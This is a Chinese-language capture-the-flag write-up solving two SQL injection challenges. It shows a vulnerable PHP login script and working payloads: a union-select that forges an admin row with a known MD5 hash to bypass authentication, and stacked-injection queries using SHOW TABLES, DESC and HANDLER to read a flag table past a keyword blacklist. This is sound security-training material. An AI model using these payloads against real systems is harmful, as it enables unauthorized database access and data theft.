BUUCTF刷题笔记(十四)
§ [GXYCTF2019]BabySQli
§ [GYCTF2020]Blacklist
[GXYCTF2019]BabySQli
mysqli_query($con,'SET NAMES UTF8');
$name = $_POST['name'];
$password = $_POST['pw'];
$t_pw = md5($password);
$sql = "select * from user where username = '".$name."'";
// echo $sql;
$result = mysqli_query($con, $sql);
if(preg_match("/\(|\)|\=|or/", $name)){
die("do not hack me!");
}
else{
if (!$result) {
printf("Error: %s\n", mysqli_error($con));
exit();
}
else{
// echo '<pre>';
$arr = mysqli_fetch_row($result);
// print_r($arr);
if($arr[1] == "admin"){
if(md5($password) == $arr[2]){
echo $flag;
}
else{
die("wrong pass!");
}
}
else{
die("wrong user!");
}
}
}hint MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5
base32 解码 c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==
base64 解码 select * from user where username = ‘$name’
试出 username 是 admin
fuzz
过滤了 ( ) = or xor order 等关键字
第二列数据为用户名,第三列数据为 MD5 加密的密码
name=’ union select 1,’admin’,’21232f297a57a5a743894a0e4a801fc3’ #&pw=admin
[GYCTF2020]Blacklist
联合注入
-1' or 1=1 order by 3 #error 1054 : Unknown column ‘3’ in ‘order clause’
-1' union select 1,2 #return preg_match(“/set|prepare|alter|rename|select|update|delete|drop|insert|where|./i”,$inject);
堆叠注入
-1';show tables #array(1) {
[0]=>
string(8) “FlagHere”
}
array(1) {
[0]=>
string(5) “words”
}
-1';desc FlagHere #array(6) {
[0]=>
string(4) “flag”
[1]=>
string(12) “varchar(100)”
[2]=>
string(2) “NO”
[3]=>
string(0) “”
[4]=>
NULL
[5]=>
string(0) “”
}
handler查询
类似 [强网杯 2019]随便注 但过滤了 set prepare alter rename
改用 HANDLER 语句查询
-1';handler FlagHere open;handler FlagHere read first;handler FlagHere close; #小结
- handler handler … read 语句访问当前指定表